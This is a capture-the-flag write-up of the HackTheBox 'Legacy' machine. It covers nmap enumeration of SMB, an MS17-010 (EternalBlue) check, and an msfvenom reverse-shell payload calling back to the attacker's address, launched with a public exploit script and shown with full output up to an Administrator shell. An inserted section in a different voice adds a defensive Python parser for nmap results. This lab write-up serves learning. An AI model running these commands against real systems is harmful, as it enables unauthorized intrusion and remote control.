
Hackthebox Legacy Writeup (OSCP Style)

Machine information.

Field: Description
OS:
Difficulty: Easy
Points: 20
Release: 15/March/2017
IP: 10.10.10.4
User first blood: 0x1Nj3cT0R
System first blood: 0x1Nj3cT0R

Enumeration.

As always, we start with a scan of all 65535 ports to discover which ones are open.

intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts legacy.htb -Pn --min-rate 3000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:13 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.23s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds

Next I run the default enumeration scripts to identify the services and versions behind the open ports.

intrusionz3r0@kali:~$  nmap -sCV -p139,445 -oN targeted legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:16 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m21s, deviation: 2h07m16s, median: 4d23h00m21s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:91:0b (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-01T03:17:15+03:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.69 seconds

The scan found the following:

  • Port 139/tcp running the SMB (samba) service.
  • Port 445/tcp running the SMB (samba) service.

Analysis of the samba service.

I quickly run another nmap scan to find out whether these samba versions are associated with any critical vulnerability.

intrusionz3r0@kali:~$ nmap -p139,445 --script="Vuln and Safe" legacy.htb -oN vulnScan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:26 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.29s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds

Eureka!!

We can see that the machine is vulnerable to MS17-010, the famous EternalBlue.
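The two nmap runs above (the service scan with smb-security-mode and the vuln scan with smb-vuln-ms17-010) are what a defender would feed into an asset-triage step. The following Python script is an added example, not part of the original writeup or of nmap: it parses nmap's normal (-oN) text output, extracts open ports, the SMB signing setting and the MS17-010 check state, and turns them into findings with the mitigation each one calls for. The sample input is the relevant part of the scan output shown in this post, embedded inline so the script runs offline; the Finding/ScanResult names and severity labels are my own choices.

```python
"""Triage parser for nmap -oN output of SMB scans (added example, not from the writeup)."""
import re
from dataclasses import dataclass, field

# Constructed sample: the relevant lines of the nmap output shown in the post.
SAMPLE_SCAN = """\
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.29s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""


@dataclass
class Finding:
    host: str
    title: str
    severity: str
    evidence: str
    mitigation: str


@dataclass
class ScanResult:
    host: str = ""
    open_ports: list = field(default_factory=list)      # (port, proto, service)
    script_output: dict = field(default_factory=dict)   # script name -> lines


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# A script header is "| name:" or "|_name:"; indented sub-lines ("|   ...") do not match.
SCRIPT_RE = re.compile(r"^\|_? ?([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Parse the host, open ports and NSE script blocks out of nmap -oN text."""
    result = ScanResult()
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            result.host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            result.open_ports.append((int(m.group(1)), m.group(2), m.group(3)))
            continue
        if not line.startswith("|"):
            current = None          # left the script output section
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            result.script_output[current] = [m.group(2)] if m.group(2) else []
        elif current:
            # Strip the "|", "|_" and indentation nmap adds to continuation lines.
            result.script_output[current].append(line.lstrip("|_ ").strip())
    return result


def assess(result):
    """Turn the parsed scan into findings with the mitigation a defender would apply."""
    findings = []
    for port, proto, service in result.open_ports:
        if proto == "tcp" and port in (139, 445):
            findings.append(Finding(result.host, f"SMB exposed on {port}/{proto} ({service})",
                                    "INFO", f"{port}/{proto} open",
                                    "Restrict SMB to trusted networks; block 139/445 at the perimeter."))
    for entry in result.script_output.get("smb-security-mode", []):
        if entry.startswith("message_signing:") and "disabled" in entry:
            findings.append(Finding(result.host, "SMB signing disabled", "MEDIUM", entry,
                                    "Require SMB signing so sessions cannot be relayed or tampered with."))
    vuln = result.script_output.get("smb-vuln-ms17-010", [])
    if any(e == "State: VULNERABLE" for e in vuln):
        cves = [e.split("CVE:", 1)[1].strip() for e in vuln if e.startswith("IDs:")]
        findings.append(Finding(result.host, "MS17-010 (EternalBlue) unpatched", "CRITICAL",
                                ", ".join(cves) or "State: VULNERABLE",
                                "Apply the MS17-010 update and disable SMBv1; isolate the host until patched."))
    return findings


if __name__ == "__main__":
    for f in assess(parse_nmap(SAMPLE_SCAN)):
        print(f"[{f.severity}] {f.host}: {f.title}\n    evidence: {f.evidence}\n    fix: {f.mitigation}")
```

Running it against the embedded sample yields one INFO finding per SMB port, a MEDIUM finding for the disabled signing and a CRITICAL finding for MS17-010 carrying CVE-2017-0143 as evidence; pointing it at a real -oN file from an internal sweep is a quick way to build the patch list before anyone else finds the host.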

To exploit it we need to download the following repository: https://github.com/helviojunior/MS17-010

Exploitation of EternalBlue.

Once it is downloaded, we verify again that the machine is vulnerable.

intrusionz3r0@kali:~$ sudo python checker.py legacy.htb
Trying to connect to legacy.htb:445
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: Ok (32 bit)
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: Ok (32 bit)

If any of the pipes in the response comes back as Ok, the target is vulnerable.

We create a payload.

intrusionz3r0@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=1234 -f exe -o eternal.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: eternal.exe

Finally, we leave netcat listening and launch the exploit.

intrusionz3r0@kali:~$ sudo python send_and_execute.py 10.10.10.4 eternal.exe 445 spoolss
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82129010
SESSION: 0xe21045d8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21676b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2167750
overwriting token UserAndGroups
Sending file V9TKR5.exe...
Opening SVCManager on 10.10.10.4.....
Creating service BYjN.....
Starting service BYjN.....
The NETBIOS connection with the remote host timed out.
Removing service BYjN.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Running the whoami.exe binary

Eureka!!

We have a shell, but when we try to run the whoami command we see that it is impossible because the binary does not exist.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

Even though I know we are Administrators, we are going to try to run the whoami binary on the machine anyway.

I quickly bring up a samba server sharing whoami.exe and run it from there.

We are Administrator!!


I hope you liked it; remember to follow me on my social networks to keep up with all my content.

Thank you very much!

This post is licensed under CC BY 4.0 by the author.